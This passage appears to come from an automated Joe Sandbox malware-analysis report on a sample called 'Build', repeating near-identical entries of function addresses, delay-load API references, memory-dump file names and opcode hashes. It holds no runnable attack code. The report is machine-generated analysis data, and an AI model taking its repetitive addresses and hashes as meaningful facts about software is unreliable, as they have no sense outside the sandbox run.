Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9a1d295c9a46c6904241177ec3ce05c36a1aa2d5b3f914273832872797906bb5
Instruction ID: 2cbf837bb244e5dfda0ad1b93fe8dc4cefe79977179e1487ff13d8a335f18deb
Opcode Fuzzy Hash: 9a1d295c9a46c6904241177ec3ce05c36a1aa2d5b3f914273832872797906bb5
Instruction Fuzzy Hash: 66A002D6659543BC311561955D16D3F011CD4C4B553318D2FF506C4441586C1C6D503B

Function 0044075A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0044068E

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4c4c9315834800d2fbc27d4d6ccb3c08de27db56113eb62f1876582663352c63
Instruction ID: 2cbf837bb244e5dfda0ad1b93fe8dc4cefe79977179e1487ff13d8a335f18deb
Opcode Fuzzy Hash: 4c4c9315834800d2fbc27d4d6ccb3c08de27db56113eb62f1876582663352c63
Instruction Fuzzy Hash: 66A002D6659543BC311561955D16D3F011CD4C4B553318D2FF506C4441586C1C6D503B

Function 0044076E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0044068E

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 92f21069e6eac8de8d9a55ee91cb0e5e13e3de1007f767da7a91d2e7f76814a4
Instruction ID: 2cbf837bb244e5dfda0ad1b93fe8dc4cefe79977179e1487ff13d8a335f18deb
Opcode Fuzzy Hash: 92f21069e6eac8de8d9a55ee91cb0e5e13e3de1007f767da7a91d2e7f76814a4
Instruction Fuzzy Hash: 66A002D6659543BC311561955D16D3F011CD4C4B553318D2FF506C4441586C1C6D503B

Function 00440778 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0044068E

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ca7d51e8c964a74f965e4f32bfe405910e345a4911e3d08208ffbf1d08f4e488
Instruction ID: 2cbf837bb244e5dfda0ad1b93fe8dc4cefe79977179e1487ff13d8a335f18deb
Opcode Fuzzy Hash: ca7d51e8c964a74f965e4f32bfe405910e345a4911e3d08208ffbf1d08f4e488
Instruction Fuzzy Hash: 66A002D6659543BC311561955D16D3F011CD4C4B553318D2FF506C4441586C1C6D503B

Function 0044070A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0044068E

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 14c7aa861ddfdfea84fc3122cadf1039dd36961cd5f8fa5b0a381169f32fedf1
Instruction ID: 2cbf837bb244e5dfda0ad1b93fe8dc4cefe79977179e1487ff13d8a335f18deb
Opcode Fuzzy Hash: 14c7aa861ddfdfea84fc3122cadf1039dd36961cd5f8fa5b0a381169f32fedf1
Instruction Fuzzy Hash: 66A002D6659543BC311561955D16D3F011CD4C4B553318D2FF506C4441586C1C6D503B

Function 00440728 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0044068E

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ecc00aabff5af0a1a2b1b8dc22f29ce5962ae018aa49e13677eb2d8a70619e44
Instruction ID: 2cbf837bb244e5dfda0ad1b93fe8dc4cefe79977179e1487ff13d8a335f18deb
Opcode Fuzzy Hash: ecc00aabff5af0a1a2b1b8dc22f29ce5962ae018aa49e13677eb2d8a70619e44
Instruction Fuzzy Hash: 66A002D6659543BC311561955D16D3F011CD4C4B553318D2FF506C4441586C1C6D503B

Function 0044073C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0044068E

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 28b18d6fd953a60086d3c6a1b193e6d6f275f57d52bb780c5c1f5e611390a023
Instruction ID: 2cbf837bb244e5dfda0ad1b93fe8dc4cefe79977179e1487ff13d8a335f18deb
Opcode Fuzzy Hash: 28b18d6fd953a60086d3c6a1b193e6d6f275f57d52bb780c5c1f5e611390a023
Instruction Fuzzy Hash: 66A002D6659543BC311561955D16D3F011CD4C4B553318D2FF506C4441586C1C6D503B

Function 00440782 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0044068E

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 71e24ddd46f5f563868ef9b20e511da339377ab3bb884f74ca917251d36c1323
Instruction ID: 2cbf837bb244e5dfda0ad1b93fe8dc4cefe79977179e1487ff13d8a335f18deb
Opcode Fuzzy Hash: 71e24ddd46f5f563868ef9b20e511da339377ab3bb884f74ca917251d36c1323
Instruction Fuzzy Hash: 66A002D6659543BC311561955D16D3F011CD4C4B553318D2FF506C4441586C1C6D503B

Function 004408DD Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 004408A7

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4f8cd1f314e98d62a4a1067e86846cfb3db0df896e97f7c8eb3fea0b5266573c
Instruction ID: 8c134b34530693dcb0e59c7169a87b4b3e41938d9746956da5296e6707c85b72
Opcode Fuzzy Hash: 4f8cd1f314e98d62a4a1067e86846cfb3db0df896e97f7c8eb3fea0b5266573c
Instruction Fuzzy Hash: D5A002D6669111BC310971555D06D3A121CD4C4B55330891FF505C4043586C1C5D507B

Function 004408E7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 004408A7

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 172840a469725f909575b478da9edf33eac79dd90e31e859ce6b7d4f20a25c8c
Instruction ID: 8c134b34530693dcb0e59c7169a87b4b3e41938d9746956da5296e6707c85b72
Opcode Fuzzy Hash: 172840a469725f909575b478da9edf33eac79dd90e31e859ce6b7d4f20a25c8c
Instruction Fuzzy Hash: D5A002D6669111BC310971555D06D3A121CD4C4B55330891FF505C4043586C1C5D507B

Function 004408F1 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 004408A7

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6fda89997eb6cb9be20478f7631d32f579c76ff7e92e79d1d420f5caccdd0edc
Instruction ID: 8c134b34530693dcb0e59c7169a87b4b3e41938d9746956da5296e6707c85b72
Opcode Fuzzy Hash: 6fda89997eb6cb9be20478f7631d32f579c76ff7e92e79d1d420f5caccdd0edc
Instruction Fuzzy Hash: D5A002D6669111BC310971555D06D3A121CD4C4B55330891FF505C4043586C1C5D507B

Function 0044089A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 004408A7

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9557b41226847e99236d95008173056594d7ba634b7b1a7c5f63ad614fb496f3
Instruction ID: b6ea7536067f5bd63fd23250771b6a32e87896ec5982db37774533c0f83c73a4
Opcode Fuzzy Hash: 9557b41226847e99236d95008173056594d7ba634b7b1a7c5f63ad614fb496f3
Instruction Fuzzy Hash: F8A002D66651117C310971555D06D3A121CD4C0B15330856FF509D4047586C1C5D507B

Function 004408B5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 004408A7

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7f328022b7aef9fb97b50c489422e1ff759cdf642b8985bbc74da06f789faa78
Instruction ID: 8c134b34530693dcb0e59c7169a87b4b3e41938d9746956da5296e6707c85b72
Opcode Fuzzy Hash: 7f328022b7aef9fb97b50c489422e1ff759cdf642b8985bbc74da06f789faa78
Instruction Fuzzy Hash: D5A002D6669111BC310971555D06D3A121CD4C4B55330891FF505C4043586C1C5D507B

Function 004408BF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 004408A7

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 590a5918b2b00a622ff7eba52b94cbe049e2d4df6867809a8b0c3f3995d2098a
Instruction ID: 8c134b34530693dcb0e59c7169a87b4b3e41938d9746956da5296e6707c85b72
Opcode Fuzzy Hash: 590a5918b2b00a622ff7eba52b94cbe049e2d4df6867809a8b0c3f3995d2098a
Instruction Fuzzy Hash: D5A002D6669111BC310971555D06D3A121CD4C4B55330891FF505C4043586C1C5D507B

Function 00440A46 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 004409FC

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6e8043b104f8f572c0b665468ce2b0be849231c13935a5a36a316c3f931ad451
Instruction ID: 725f8c40ea21665f82dc66bae110e006a534593313c5f8ba2162b48ec7b504f9
Opcode Fuzzy Hash: 6e8043b104f8f572c0b665468ce2b0be849231c13935a5a36a316c3f931ad451
Instruction Fuzzy Hash: 11A002D5799101FC75056155AD16D76011CD4C4B55730892FF505C4046587D285D513A

Function 00440A50 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00440A5D

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e457572d57950a85f7d525e5a99833d0c16454fc7a9414b4a7ca7d46817111c9
Instruction ID: 62de228e6b59aaca13080b405d5ccadeb19fce6fe4bc5fc7a8a495196a97380f
Opcode Fuzzy Hash: e457572d57950a85f7d525e5a99833d0c16454fc7a9414b4a7ca7d46817111c9
Instruction Fuzzy Hash: 33A002D5695101FC310571959D16D36025CD4D0B15730951FF645D4081686D685E503A

Function 00440A6B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00440A5D

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

